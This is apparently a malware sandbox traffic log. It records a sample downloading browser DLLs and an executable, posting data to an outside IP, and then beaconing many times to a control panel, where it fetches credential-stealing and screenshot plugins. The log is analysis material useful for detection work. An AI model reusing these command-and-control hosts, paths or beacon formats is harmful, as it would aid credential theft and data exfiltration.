                              Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 108331Host: 78.47.81.226Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /wp-content/themes/cinestar/extendvc/xsrv2.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: ukedocumentary.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: GET /Hnq8vS/plugins/cred.dll HTTP/1.1Host: 176.111.174.114
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: GET /Hnq8vS/plugins/scr.dll HTTP/1.1Host: 176.111.174.114
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST //Hnq8vS/index.php HTTP/1.1Host: 176.111.174.114Content-Length: 21Content-Type: application/x-www-form-urlencodedData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 63 72 65 64 3d Data Ascii: id=152138533219&cred=
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
